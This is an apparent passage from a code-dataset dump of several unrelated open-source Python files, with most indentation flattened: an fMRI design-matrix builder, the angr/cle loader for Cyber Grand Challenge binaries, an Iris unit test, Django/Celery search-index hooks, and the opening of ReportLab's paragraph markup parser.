to the make_first_level_design_matrix function, that create a DataFrame
All the others are ancillary functions.
Design matrices contain three different types of regressors:
1. Task-related regressors, that result from the convolution
of the experimental paradigm regressors with hemodynamic models
A hemodynamic model is one of:
- 'spm' : linear filter used in the SPM software
- 'glover' : linear filter estimated by G.Glover
- 'spm + derivative', 'glover + derivative': the same linear models,
plus their time derivative (2 regressors per condition)
- 'spm + derivative + dispersion', 'glover + derivative + dispersion':
idem plus the derivative wrt the dispersion parameter of the hrf
(3 regressors per condition)
- 'fir' : finite impulse response model, generic linear filter
2. User-specified regressors, that represent information available on
the data, e.g. motion parameters, physiological data resampled at
the acquisition rate, or sinusoidal regressors that model the
signal at a frequency of interest.
3. Drift regressors, that represent low_frequency phenomena of no
interest in the data; they need to be included to reduce variance
estimates.
Author: Bertrand Thirion, 2009-2015
"""
from __future__ import with_statement
import sys
from warnings import warn
import numpy as np
import pandas as pd
from .experimental_paradigm import check_events
from .hemodynamic_models import compute_regressor, _orthogonalize
from .utils import full_rank, _basestring
######################################################################
# Ancillary functions
######################################################################
def _poly_drift(order, frame_times):
"""Create a polynomial drift matrix
Parameters
----------
order : int,
Number of polynomials in the drift model.
frame_times : array of shape(n_scans),
Time stamps used to sample polynomials.
Returns
-------
pol : ndarray, shape(n_scans, order + 1)
estimated polynomial drifts plus a constant regressor
"""
order = int(order)
pol = np.zeros((np.size(frame_times), order + 1))
tmax = float(frame_times.max())
for k in range(order + 1):
pol[:, k] = (frame_times / tmax) ** k
pol = _orthogonalize(pol)
pol = np.hstack((pol[:, 1:], pol[:, :1]))
return pol
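# Illustrative sketch (added for exposition; never called by the module):
# _poly_drift(2, frame_times) returns an array of shape
# (len(frame_times), 3), i.e. two orthogonalized polynomial drift columns
# followed by the constant column.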
def _cosine_drift(high_pass, frame_times):
"""Create a cosine drift matrix with frequencies or equal to
high_pass.
Parameters
----------
high_pass : float
Cut frequency of the high-pass filter in Hz
frame_times : array of shape (n_scans,)
The sampling times in seconds
Returns
-------
cosine_drift : array of shape(n_scans, n_drifts)
Cosine drifts plus a constant regressor at cosine_drift[:, -1]
Ref: http://en.wikipedia.org/wiki/Discrete_cosine_transform DCT-II
"""
n_frames = len(frame_times)
n_times = np.arange(n_frames)
dt = (frame_times[-1] - frame_times[0]) / (n_frames - 1)
if high_pass * dt >= .5:
warn('High-pass filter will span all accessible frequencies '
'and saturate the design matrix. '
             'You may want to reduce the high_pass value. '
             'The provided value is {0} Hz.'.format(high_pass))
order = np.minimum(n_frames - 1,
int(np.floor(2 * n_frames * high_pass * dt)))
cosine_drift = np.zeros((n_frames, order + 1))
normalizer = np.sqrt(2.0 / n_frames)
for k in range(1, order + 1):
cosine_drift[:, k - 1] = normalizer * np.cos(
(np.pi / n_frames) * (n_times + .5) * k)
cosine_drift[:, -1] = 1.
return cosine_drift
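# Illustrative sketch (added for exposition; not part of the original API and
# never called by the module): with a 2 s repetition time over 128 frames and
# a 0.01 Hz cut-off, the DCT-II basis has
# int(floor(2 * 128 * 0.01 * 2.0)) = 5 cosine columns plus the trailing
# constant column.
def _example_cosine_drift():
    frame_times = np.arange(128) * 2.
    return _cosine_drift(0.01, frame_times).shape  # -> (128, 6)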
def _none_drift(frame_times):
""" Create an intercept vector
Returns
-------
np.ones_like(frame_times)
"""
return np.reshape(np.ones_like(frame_times), (np.size(frame_times), 1))
def _make_drift(drift_model, frame_times, order, high_pass):
"""Create the drift matrix
Parameters
----------
drift_model : {'polynomial', 'cosine', None},
string that specifies the desired drift model
frame_times : array of shape(n_scans),
        the sampling times of the scans (in seconds)
order : int, optional,
order of the drift model (in case it is polynomial)
high_pass : float, optional,
high-pass frequency in case of a cosine model (in Hz)
Returns
-------
drift : array of shape(n_scans, n_drifts),
the drift matrix
names : list of length(n_drifts),
the associated names
"""
if isinstance(drift_model, _basestring):
drift_model = drift_model.lower() # for robust comparisons
if drift_model == 'polynomial':
drift = _poly_drift(order, frame_times)
elif drift_model == 'cosine':
drift = _cosine_drift(high_pass, frame_times)
elif drift_model is None:
drift = _none_drift(frame_times)
else:
raise NotImplementedError("Unknown drift model %r" % (drift_model))
names = []
for k in range(1, drift.shape[1]):
names.append('drift_%d' % k)
names.append('constant')
return drift, names
def _convolve_regressors(events, hrf_model, frame_times, fir_delays=[0],
min_onset=-24, oversampling=50):
""" Creation of a matrix that comprises
the convolution of the conditions onset with a certain hrf model
Parameters
----------
events : DataFrame instance,
Events data describing the experimental paradigm
see nistats.experimental_paradigm to check the specification
for these to be valid paradigm descriptors
hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion',
'glover', 'glover + derivative', 'glover + derivative + dispersion',
'fir', None}
String that specifies the hemodynamic response function
frame_times : array of shape (n_scans,)
The targeted timing for the design matrix.
fir_delays : array-like of shape (n_onsets,), optional,
In case of FIR design, yields the array of delays
used in the FIR model (in scans).
min_onset : float, optional (default: -24),
        Minimal onset relative to frame_times[0] (in seconds); events
        that start before frame_times[0] + min_onset are not considered.
oversampling: int optional, default:50,
Oversampling factor used in temporal convolutions.
Returns
-------
regressor_matrix : array of shape (n_scans, n_regressors),
Contains the convolved regressors associated with the
experimental conditions.
regressor_names : list of strings,
The regressor names, that depend on the hrf model used
if 'glover' or 'spm' then this is identical to the input names
if 'glover + derivative' or 'spm + derivative', a second name is output
i.e. '#name_derivative'
if 'spm + derivative + dispersion' or
'glover + derivative + dispersion',
a third name is used, i.e. '#name_dispersion'
        if 'fir', the regressors are numbered according to '#name_#delay'
"""
regressor_names = []
regressor_matrix = None
trial_type, onset, duration, modulation = check_events(events)
for condition in np.unique(trial_type):
condition_mask = (trial_type == condition)
exp_condition = (onset[condition_mask],
duration[condition_mask],
modulation[condition_mask])
reg, names = compute_regressor(
exp_condition, hrf_model, frame_times, con_id=condition,
fir_delays=fir_delays, oversampling=oversampling,
min_onset=min_onset)
regressor_names += names
if regressor_matrix is None:
regressor_matrix = reg
else:
regressor_matrix = np.hstack((regressor_matrix, reg))
return regressor_matrix, regressor_names
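# Illustrative sketch (added for exposition; the event timings are made up
# and the function is never called by the module): with no 'trial_type'
# column, check_events labels every event 'dummy', so a single convolved
# regressor comes back.
def _example_convolve_regressors():
    frame_times = np.arange(100) * 2.
    events = pd.DataFrame({'onset': [10., 40., 70.],
                           'duration': [1., 1., 1.]})
    reg, names = _convolve_regressors(events, 'glover', frame_times)
    return reg.shape, names  # -> ((100, 1), ['dummy'])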
######################################################################
# Design matrix creation
######################################################################
def make_first_level_design_matrix(
frame_times, events=None, hrf_model='glover',
drift_model='cosine', high_pass=.01, drift_order=1, fir_delays=[0],
add_regs=None, add_reg_names=None, min_onset=-24, oversampling=50):
"""Generate a design matrix from the input parameters
Parameters
----------
frame_times : array of shape (n_frames,)
The timing of acquisition of the scans in seconds.
events : DataFrame instance, optional
Events data that describes the experimental paradigm.
The DataFrame instance might have these keys:
            'onset': column to specify the start time of each event in
                     seconds. An error is raised if this key is missing.
            'trial_type': column to specify per-event experimental condition
                          identifiers. If missing, each event is labelled
                          'dummy' and considered to form a unique condition.
            'duration': column to specify the duration of each event in
                        seconds. If missing, the duration of each event is set
                        to zero.
            'modulation': column to specify the amplitude of each
                          event. If missing, the default is set to
                          ones(n_events).
An experimental paradigm is valid if it has an 'onset' key
and a 'duration' key.
If these keys are missing an error will be raised.
For the others keys a warning will be displayed.
Particular attention should be given to the 'trial_type' key
which defines the different conditions in the experimental paradigm.
hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion',
'glover', 'glover + derivative', 'glover + derivative + dispersion',
'fir', None}, optional,
Specifies the hemodynamic response function
drift_model : {'polynomial', 'cosine', None}, optional
Specifies the desired drift model,
    high_pass : float, optional
        High-pass frequency of the filter in Hz.
        Used only if drift_model is 'cosine'.
drift_order : int, optional
Order of the drift model (in case it is polynomial).
fir_delays : array of shape(n_onsets) or list, optional,
In case of FIR design, yields the array of delays used in the FIR
model (in scans).
add_regs : array of shape(n_frames, n_add_reg), optional
additional user-supplied regressors, e.g. data driven noise regressors
or seed based regressors.
add_reg_names : list of (n_add_reg,) strings, optional
If None, while add_regs was provided, these will be termed
'reg_%i', i = 0..n_add_reg - 1
min_onset : float, optional
        Minimal onset relative to frame_times[0] (in seconds);
        events that start before frame_times[0] + min_onset are not considered.
oversampling: int, optional,
Oversampling factor used in temporal convolutions.
Returns
-------
design_matrix : DataFrame instance,
holding the computed design matrix, the index being the frames_times
and each column a regressor.
"""
# check arguments
# check that additional regressor specification is correct
n_add_regs = 0
if add_regs is not None:
if add_regs.shape[0] == np.size(add_regs):
add_regs = np.reshape(add_regs, (np.size(add_regs), 1))
n_add_regs = add_regs.shape[1]
        if add_regs.shape[0] != np.size(frame_times):
            raise ValueError(
                'Incorrect specification of additional regressors: '
                'length of regressors provided: %d, number of '
                'time-frames: %d' % (add_regs.shape[0], np.size(frame_times)))
# check that additional regressor names are well specified
if add_reg_names is None:
add_reg_names = ['reg%d' % k for k in range(n_add_regs)]
elif len(add_reg_names) != n_add_regs:
raise ValueError(
'Incorrect number of additional regressor names was provided'
'(%d provided, %d expected' % (len(add_reg_names),
n_add_regs))
# computation of the matrix
names = []
matrix = None
# step 1: events-related regressors
if events is not None:
# create the condition-related regressors
if isinstance(hrf_model, _basestring):
hrf_model = hrf_model.lower()
matrix, names = _convolve_regressors(
events, hrf_model, frame_times, fir_delays, min_onset,
oversampling)
# step 2: additional regressors
if add_regs is not None:
# add user-supplied regressors and corresponding names
if matrix is not None:
matrix = np.hstack((matrix, add_regs))
else:
matrix = add_regs
names += add_reg_names
# step 3: drifts
drift, dnames = _make_drift(drift_model, frame_times, drift_order,
high_pass)
if matrix is not None:
matrix = np.hstack((matrix, drift))
else:
matrix = drift
names += dnames
# check column names are all unique
if len(np.unique(names)) != len(names):
raise ValueError('Design matrix columns do not have unique names')
# step 4: Force the design matrix to be full rank at working precision
matrix, _ = full_rank(matrix)
design_matrix = pd.DataFrame(
matrix, columns=names, index=frame_times)
return design_matrix
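# Illustrative usage sketch (added for exposition; the paradigm below is
# invented and the function is never called by the module): two alternating
# conditions acquired with a 2 s repetition time.
def _example_first_level_design():
    frame_times = np.arange(128) * 2.
    events = pd.DataFrame({'trial_type': ['audio', 'video'] * 4,
                           'onset': np.arange(8) * 30.,
                           'duration': np.ones(8)})
    # one convolved regressor per condition, plus the cosine drifts and the
    # constant column
    return make_first_level_design_matrix(frame_times, events)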
def check_design_matrix(design_matrix):
""" Check that the provided DataFrame is indeed a valid design matrix
descriptor, and returns a triplet of fields
Parameters
----------
design matrix : pandas DataFrame,
Describes a design matrix.
Returns
-------
frame_times : array of shape (n_frames,),
Sampling times of the design matrix in seconds.
matrix : array of shape (n_frames, n_regressors), dtype='f'
Numerical values for the design matrix.
    names : list of str,
        The column (regressor) names of the design matrix.
"""
names = [name for name in design_matrix.keys()]
frame_times = design_matrix.index
matrix = design_matrix.values
return frame_times, matrix, names
def make_second_level_design_matrix(subjects_label, confounds=None):
"""Sets up a second level design.
Construct a design matrix with an intercept and subject specific confounds.
Parameters
----------
subjects_label: list of str
Contain subject labels to extract confounders in the right order,
corresponding with the images, to create the design matrix.
confounds: pandas DataFrame, optional
If given, contains at least two columns, 'subject_label' and one
confound. The subjects list determines the rows to extract from
confounds thanks to its 'subject_label' column. All subjects must
have confounds specified. There should be only one row per subject.
Returns
-------
design_matrix: pandas DataFrame
The second level design matrix
"""
confounds_name = []
if confounds is not None:
confounds_name = confounds.columns.tolist()
confounds_name.remove('subject_label')
design_columns = (confounds_name + ['intercept'])
# check column names are unique
if len(np.unique(design_columns)) != len(design_columns):
raise ValueError('Design matrix columns do not have unique names')
# float dtype necessary for linalg
design_matrix = pd.DataFrame(columns=design_columns, dtype=float)
for ridx, subject_label in enumerate(subjects_label):
design_matrix.loc[ridx] = [0] * len(design_columns)
design_matrix.loc[ridx, 'intercept'] = 1
if confounds is not None:
conrow = confounds['subject_label'] == subject_label
if np.sum(conrow) > 1:
raise ValueError('confounds contain more than one row for '
'subject %s' % subject_label)
elif np.sum(conrow) == 0:
raise ValueError('confounds not specified for subject %s' %
subject_label)
for conf_name in confounds_name:
confounds_value = confounds[conrow][conf_name].values[0]
design_matrix.loc[ridx, conf_name] = confounds_value
# check design matrix is not singular
if np.linalg.cond(design_matrix.values) > design_matrix.size:
warn('Attention: Design matrix is singular. Aberrant estimates '
'are expected.')
return design_matrix
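# Illustrative usage sketch (added for exposition; the subject labels and
# confound values are invented, and the function is never called by the
# module):
def _example_second_level_design():
    subjects = ['sub-01', 'sub-02', 'sub-03']
    confounds = pd.DataFrame({'subject_label': subjects,
                              'age': [23., 31., 27.]})
    # one row per subject: an 'age' column plus the intercept
    return make_second_level_design_matrix(subjects, confounds)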
| bsd-3-clause | -7,965,344,307,184,148,000 | 35.963203 | 79 | 0.624758 | false |
angr/cle | cle/backends/cgc/cgc.py | 1 | 1352 | from ...address_translator import AT
from .. import register_backend
from ..elf import ELF
from ...patched_stream import PatchedStream
ELF_HEADER = bytes.fromhex("7f454c46010101000000000000000000")
CGC_HEADER = bytes.fromhex("7f43474301010143014d6572696e6f00")
class CGC(ELF):
"""
Backend to support the CGC elf format used by the Cyber Grand Challenge competition.
See : https://github.com/CyberGrandChallenge/libcgcef/blob/master/cgc_executable_format.md
"""
is_default = True # Tell CLE to automatically consider using the CGC backend
def __init__(self, binary, binary_stream, *args, **kwargs):
binary_stream = PatchedStream(binary_stream, [(0, ELF_HEADER)])
super().__init__(binary, binary_stream, *args, **kwargs)
self.memory.store(AT.from_raw(0, self).to_rva(), CGC_HEADER) # repair the CGC header
self.os = 'cgc'
self.execstack = True # the stack is always executable in CGC
@staticmethod
def is_compatible(stream):
stream.seek(0)
identstring = stream.read(4)
stream.seek(0)
if identstring.startswith(b'\x7fCGC'):
return True
return False
def _load_segment(self, seg):
if seg.header.p_memsz > 0:
super()._load_segment(seg)
supported_filetypes = ['cgc']
register_backend('cgc', CGC)
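# Illustrative usage sketch (added for exposition; the path is hypothetical):
# because is_default is True and is_compatible() matches the '\x7fCGC' magic,
# a plain loader call should pick this backend automatically, e.g.
#   import cle
#   ld = cle.Loader('/path/to/challenge_binary')
#   assert ld.main_object.os == 'cgc'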
| bsd-2-clause | -3,029,612,784,850,716,000 | 32.8 | 94 | 0.664201 | false |
bjlittle/iris | lib/iris/tests/unit/util/test_equalise_attributes.py | 1 | 4697 | # Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""
Unit tests for the :func:`iris.util.equalise_attributes` function.
"""
# import iris tests first so that some things can be initialised
# before importing anything else.
import iris.tests as tests # isort:skip
import numpy as np
from iris.cube import Cube
import iris.tests.stock
from iris.util import equalise_attributes
class TestEqualiseAttributes(tests.IrisTest):
def setUp(self):
empty = Cube([])
self.cube_no_attrs = empty.copy()
self.cube_a1 = empty.copy()
self.cube_a1.attributes.update({"a": 1})
self.cube_a2 = empty.copy()
self.cube_a2.attributes.update({"a": 2})
self.cube_a1b5 = empty.copy()
self.cube_a1b5.attributes.update({"a": 1, "b": 5})
self.cube_a1b6 = empty.copy()
self.cube_a1b6.attributes.update({"a": 1, "b": 6})
self.cube_a2b6 = empty.copy()
self.cube_a2b6.attributes.update({"a": 2, "b": 6})
self.cube_b5 = empty.copy()
self.cube_b5.attributes.update({"b": 5})
# Array attribute values
v1 = np.array([11, 12, 13])
v2 = np.array([11, 9999, 13])
self.v1 = v1
self.cube_a1b5v1 = empty.copy()
self.cube_a1b5v1.attributes.update({"a": 1, "b": 5, "v": v1})
self.cube_a1b6v1 = empty.copy()
self.cube_a1b6v1.attributes.update({"a": 1, "b": 6, "v": v1})
self.cube_a1b6v2 = empty.copy()
self.cube_a1b6v2.attributes.update({"a": 1, "b": 6, "v": v2})
def _test(self, cubes, expect_attributes):
"""Test."""
working_cubes = [cube.copy() for cube in cubes]
original_working_list = [cube for cube in working_cubes]
# Exercise basic operation
equalise_attributes(working_cubes)
# Check they are the same cubes
self.assertEqual(working_cubes, original_working_list)
# Check resulting attributes all match the expected set
for cube in working_cubes:
self.assertEqual(cube.attributes, expect_attributes)
# Check everything else remains the same
for new_cube, old_cube in zip(working_cubes, cubes):
cube_before_noatts = old_cube.copy()
cube_before_noatts.attributes.clear()
cube_after_noatts = new_cube.copy()
cube_after_noatts.attributes.clear()
self.assertEqual(cube_after_noatts, cube_before_noatts)
def test_no_attrs(self):
cubes = [self.cube_no_attrs]
self._test(cubes, {})
def test_single(self):
cubes = [self.cube_a1]
self._test(cubes, {"a": 1})
def test_identical(self):
cubes = [self.cube_a1, self.cube_a1.copy()]
self._test(cubes, {"a": 1})
def test_one_extra(self):
cubes = [self.cube_a1, self.cube_a1b5.copy()]
self._test(cubes, {"a": 1})
def test_one_different(self):
cubes = [self.cube_a1b5, self.cube_a1b6]
self._test(cubes, {"a": 1})
def test_common_no_diffs(self):
cubes = [self.cube_a1b5, self.cube_a1b5.copy()]
self._test(cubes, {"a": 1, "b": 5})
def test_common_all_diffs(self):
cubes = [self.cube_a1b5, self.cube_a2b6]
self._test(cubes, {})
def test_none_common(self):
cubes = [self.cube_a1, self.cube_b5]
self._test(cubes, {})
def test_array_extra(self):
cubes = [self.cube_a1b6, self.cube_a1b6v1]
self._test(cubes, {"a": 1, "b": 6})
def test_array_different(self):
cubes = [self.cube_a1b5v1, self.cube_a1b6v2]
self._test(cubes, {"a": 1})
def test_array_same(self):
cubes = [self.cube_a1b5v1, self.cube_a1b6v1]
self._test(cubes, {"a": 1, "v": self.v1})
@tests.skip_data
def test_complex_nonecommon(self):
# Example with cell methods and factories, but no common attributes.
cubes = [
iris.tests.stock.global_pp(),
iris.tests.stock.hybrid_height(),
]
self._test(cubes, {})
@tests.skip_data
def test_complex_somecommon(self):
# Example with cell methods and factories, plus some common attributes.
cubes = [iris.tests.stock.global_pp(), iris.tests.stock.simple_pp()]
self._test(
cubes,
{
"STASH": iris.fileformats.pp.STASH(
model=1, section=16, item=203
),
"source": "Data from Met Office Unified Model",
},
)
if __name__ == "__main__":
tests.main()
| lgpl-3.0 | -7,437,314,332,573,180,000 | 30.736486 | 79 | 0.585054 | false |
crateio/crate.web | crate/web/search/indexes.py | 1 | 2307 | from django.db.models import signals
from celery_haystack.indexes import CelerySearchIndex as BaseCelerySearchIndex
from crate.web.packages.models import Package, Release, ReleaseFile
class PackageCelerySearchIndex(BaseCelerySearchIndex):
# We override the built-in _setup_* methods to connect the enqueuing
# operation.
def _setup_save(self, model=None):
model = self.handle_model(model)
signals.post_save.connect(self.enqueue_save, sender=model)
signals.post_save.connect(self.enqueue_save_from_release, sender=Release)
signals.post_save.connect(self.enqueue_save_from_releasefile, sender=ReleaseFile)
def _setup_delete(self, model=None):
model = self.handle_model(model)
signals.post_delete.connect(self.enqueue_delete, sender=model)
signals.post_delete.connect(self.enqueue_delete_from_release, sender=Release)
signals.post_delete.connect(self.enqueue_delete_from_releasefile, sender=ReleaseFile)
def _teardown_save(self, model=None):
model = self.handle_model(model)
signals.post_save.disconnect(self.enqueue_save, sender=model)
signals.post_save.disconnect(self.enqueue_save_from_release, sender=Release)
signals.post_save.disconnect(self.enqueue_save_from_releasefile, sender=ReleaseFile)
def _teardown_delete(self, model=None):
model = self.handle_model(model)
signals.post_delete.disconnect(self.enqueue_delete, sender=model)
signals.post_delete.disconnect(self.enqueue_delete_from_release, sender=Release)
signals.post_delete.disconnect(self.enqueue_delete_from_releasefile, sender=ReleaseFile)
def enqueue_save_from_release(self, instance, **kwargs):
return self.enqueue('update', instance.package)
def enqueue_delete_from_release(self, instance, **kwargs):
try:
return self.enqueue('update', instance.package)
except Package.DoesNotExist:
pass
def enqueue_save_from_releasefile(self, instance, **kwargs):
return self.enqueue('update', instance.release.package)
def enqueue_delete_from_releasefile(self, instance, **kwargs):
try:
return self.enqueue('update', instance.release.package)
except Release.DoesNotExist:
pass
| bsd-2-clause | 6,856,013,931,906,348,000 | 43.365385 | 96 | 0.714781 | false |
makinacorpus/reportlab-ecomobile | src/reportlab/platypus/paraparser.py | 1 | 37402 | #Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paraparser.py
__version__=''' $Id$ '''
__doc__='''The parser used to process markup within paragraphs'''
import string
import re
from types import TupleType, UnicodeType, StringType
import sys
import os
import copy
import unicodedata
import reportlab.lib.sequencer
from reportlab.lib.abag import ABag
from reportlab.lib.utils import ImageReader
from reportlab.lib import xmllib
from reportlab.lib.colors import toColor, white, black, red, Color
from reportlab.lib.fonts import tt2ps, ps2tt
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.units import inch,mm,cm,pica
_re_para = re.compile(r'^\s*<\s*para(?:\s+|>|/>)')
sizeDelta = 2 # amount to reduce font size by for super and sub script
subFraction = 0.5 # fraction of font size that a sub script should be lowered
superFraction = 0.5 # fraction of font size that a super script should be raised
def _convnum(s, unit=1):
if s[0] in ['+','-']:
try:
return ('relative',int(s)*unit)
except ValueError:
return ('relative',float(s)*unit)
else:
try:
return int(s)*unit
except ValueError:
return float(s)*unit
def _num(s, unit=1):
"""Convert a string like '10cm' to an int or float (in points).
The default unit is point, but optionally you can use other
default units like mm.
"""
if s[-2:]=='cm':
unit=cm
s = s[:-2]
if s[-2:]=='in':
unit=inch
s = s[:-2]
if s[-2:]=='pt':
unit=1
s = s[:-2]
if s[-1:]=='i':
unit=inch
s = s[:-1]
if s[-2:]=='mm':
unit=mm
s = s[:-2]
if s[-4:]=='pica':
unit=pica
s = s[:-4]
return _convnum(s,unit)
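# Illustrative sketch (added for exposition): _num accepts a bare number or a
# number with a unit suffix and always answers in points, e.g.
#   _num('10')  -> 10
#   _num('1in') -> 72.0
#   _num('+12') -> ('relative', 12)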
class _PCT:
def __init__(self,v):
self._value = v*0.01
def normalizedValue(self,normalizer):
return normalizer*self._value
def _valignpc(s):
s = s.lower()
if s in ('baseline','sub','super','top','text-top','middle','bottom','text-bottom'):
return s
if s.endswith('%'):
n = _convnum(s[:-1])
if isinstance(n,tuple):
n = n[1]
return _PCT(n)
n = _num(s)
if isinstance(n,tuple):
n = n[1]
return n
def _autoLeading(x):
x = x.lower()
if x in ('','min','max','off'):
return x
raise ValueError('Invalid autoLeading=%r' % x )
def _align(s):
s = string.lower(s)
if s=='left': return TA_LEFT
elif s=='right': return TA_RIGHT
elif s=='justify': return TA_JUSTIFY
elif s in ('centre','center'): return TA_CENTER
else: raise ValueError
_paraAttrMap = {'font': ('fontName', None),
'face': ('fontName', None),
'fontsize': ('fontSize', _num),
'size': ('fontSize', _num),
'leading': ('leading', _num),
'autoleading': ('autoLeading', _autoLeading),
'lindent': ('leftIndent', _num),
'rindent': ('rightIndent', _num),
'findent': ('firstLineIndent', _num),
'align': ('alignment', _align),
'spaceb': ('spaceBefore', _num),
'spacea': ('spaceAfter', _num),
'bfont': ('bulletFontName', None),
'bfontsize': ('bulletFontSize',_num),
'boffsety': ('bulletOffsetY',_num),
'bindent': ('bulletIndent',_num),
'bcolor': ('bulletColor',toColor),
'color':('textColor',toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
'bg':('backColor',toColor),
'fg': ('textColor',toColor),
}
_bulletAttrMap = {
'font': ('bulletFontName', None),
'face': ('bulletFontName', None),
'size': ('bulletFontSize',_num),
'fontsize': ('bulletFontSize',_num),
'offsety': ('bulletOffsetY',_num),
'indent': ('bulletIndent',_num),
'color': ('bulletColor',toColor),
'fg': ('bulletColor',toColor),
}
#things which are valid font attributes
_fontAttrMap = {'size': ('fontSize', _num),
'face': ('fontName', None),
'name': ('fontName', None),
'fg': ('textColor', toColor),
'color':('textColor', toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
}
#things which are valid font attributes
_linkAttrMap = {'size': ('fontSize', _num),
'face': ('fontName', None),
'name': ('fontName', None),
'fg': ('textColor', toColor),
'color':('textColor', toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
'dest': ('link', None),
'destination': ('link', None),
'target': ('link', None),
'href': ('link', None),
}
_anchorAttrMap = {'fontSize': ('fontSize', _num),
'fontName': ('fontName', None),
'name': ('name', None),
'fg': ('textColor', toColor),
'color':('textColor', toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
'href': ('href', None),
}
_imgAttrMap = {
'src': ('src', None),
'width': ('width',_num),
'height':('height',_num),
'valign':('valign',_valignpc),
}
def _addAttributeNames(m):
K = m.keys()
for k in K:
n = m[k][0]
if not m.has_key(n): m[n] = m[k]
n = string.lower(n)
if not m.has_key(n): m[n] = m[k]
_addAttributeNames(_paraAttrMap)
_addAttributeNames(_fontAttrMap)
_addAttributeNames(_bulletAttrMap)
_addAttributeNames(_anchorAttrMap)
_addAttributeNames(_linkAttrMap)
def _applyAttributes(obj, attr):
for k, v in attr.items():
if type(v) is TupleType and v[0]=='relative':
#AR 20/5/2000 - remove 1.5.2-ism
#v = v[1]+getattr(obj,k,0)
if hasattr(obj, k):
v = v[1]+getattr(obj,k)
else:
v = v[1]
setattr(obj,k,v)
#Named character entities intended to be supported from the special font
#with additions suggested by Christoph Zwerschke who also suggested the
#numeric entity names that follow.
greeks = {
'pound': '\xc2\xa3',
'nbsp': '\xc2\xa0',
'alefsym': '\xe2\x84\xb5',
'Alpha': '\xce\x91',
'alpha': '\xce\xb1',
'and': '\xe2\x88\xa7',
'ang': '\xe2\x88\xa0',
'asymp': '\xe2\x89\x88',
'Beta': '\xce\x92',
'beta': '\xce\xb2',
'bull': '\xe2\x80\xa2',
'cap': '\xe2\x88\xa9',
'Chi': '\xce\xa7',
'chi': '\xcf\x87',
'clubs': '\xe2\x99\xa3',
'cong': '\xe2\x89\x85',
'cup': '\xe2\x88\xaa',
'darr': '\xe2\x86\x93',
'dArr': '\xe2\x87\x93',
'delta': '\xce\xb4',
'Delta': '\xe2\x88\x86',
'diams': '\xe2\x99\xa6',
'empty': '\xe2\x88\x85',
'Epsilon': '\xce\x95',
'epsilon': '\xce\xb5',
'epsiv': '\xce\xb5',
'equiv': '\xe2\x89\xa1',
'Eta': '\xce\x97',
'eta': '\xce\xb7',
'euro': '\xe2\x82\xac',
'exist': '\xe2\x88\x83',
'forall': '\xe2\x88\x80',
'frasl': '\xe2\x81\x84',
'Gamma': '\xce\x93',
'gamma': '\xce\xb3',
'ge': '\xe2\x89\xa5',
'harr': '\xe2\x86\x94',
'hArr': '\xe2\x87\x94',
'hearts': '\xe2\x99\xa5',
'hellip': '\xe2\x80\xa6',
'image': '\xe2\x84\x91',
'infin': '\xe2\x88\x9e',
'int': '\xe2\x88\xab',
'Iota': '\xce\x99',
'iota': '\xce\xb9',
'isin': '\xe2\x88\x88',
'Kappa': '\xce\x9a',
'kappa': '\xce\xba',
'Lambda': '\xce\x9b',
'lambda': '\xce\xbb',
'lang': '\xe2\x8c\xa9',
'larr': '\xe2\x86\x90',
'lArr': '\xe2\x87\x90',
'lceil': '\xef\xa3\xae',
'le': '\xe2\x89\xa4',
'lfloor': '\xef\xa3\xb0',
'lowast': '\xe2\x88\x97',
'loz': '\xe2\x97\x8a',
'minus': '\xe2\x88\x92',
'mu': '\xc2\xb5',
'Mu': '\xce\x9c',
'nabla': '\xe2\x88\x87',
'ne': '\xe2\x89\xa0',
'ni': '\xe2\x88\x8b',
'notin': '\xe2\x88\x89',
'nsub': '\xe2\x8a\x84',
'Nu': '\xce\x9d',
'nu': '\xce\xbd',
'oline': '\xef\xa3\xa5',
'omega': '\xcf\x89',
'Omega': '\xe2\x84\xa6',
'Omicron': '\xce\x9f',
'omicron': '\xce\xbf',
'oplus': '\xe2\x8a\x95',
'or': '\xe2\x88\xa8',
'otimes': '\xe2\x8a\x97',
'part': '\xe2\x88\x82',
'perp': '\xe2\x8a\xa5',
'Phi': '\xce\xa6',
'phi': '\xcf\x95',
'phis': '\xcf\x86',
'Pi': '\xce\xa0',
'pi': '\xcf\x80',
'piv': '\xcf\x96',
'prime': '\xe2\x80\xb2',
'prod': '\xe2\x88\x8f',
'prop': '\xe2\x88\x9d',
'Psi': '\xce\xa8',
'psi': '\xcf\x88',
'radic': '\xe2\x88\x9a',
'rang': '\xe2\x8c\xaa',
'rarr': '\xe2\x86\x92',
'rArr': '\xe2\x87\x92',
'rceil': '\xef\xa3\xb9',
'real': '\xe2\x84\x9c',
'rfloor': '\xef\xa3\xbb',
'Rho': '\xce\xa1',
'rho': '\xcf\x81',
'sdot': '\xe2\x8b\x85',
'Sigma': '\xce\xa3',
'sigma': '\xcf\x83',
'sigmaf': '\xcf\x82',
'sigmav': '\xcf\x82',
'sim': '\xe2\x88\xbc',
'spades': '\xe2\x99\xa0',
'sub': '\xe2\x8a\x82',
'sube': '\xe2\x8a\x86',
'sum': '\xe2\x88\x91',
'sup': '\xe2\x8a\x83',
'supe': '\xe2\x8a\x87',
'Tau': '\xce\xa4',
'tau': '\xcf\x84',
'there4': '\xe2\x88\xb4',
'Theta': '\xce\x98',
'theta': '\xce\xb8',
'thetasym': '\xcf\x91',
'thetav': '\xcf\x91',
'trade': '\xef\xa3\xaa',
'uarr': '\xe2\x86\x91',
'uArr': '\xe2\x87\x91',
'upsih': '\xcf\x92',
'Upsilon': '\xce\xa5',
'upsilon': '\xcf\x85',
'weierp': '\xe2\x84\x98',
'Xi': '\xce\x9e',
'xi': '\xce\xbe',
'Zeta': '\xce\x96',
'zeta': '\xce\xb6',
}
#------------------------------------------------------------------------
class ParaFrag(ABag):
"""class ParaFrag contains the intermediate representation of string
segments as they are being parsed by the XMLParser.
fontname, fontSize, rise, textColor, cbDefn
"""
_greek2Utf8=None
def _greekConvert(data):
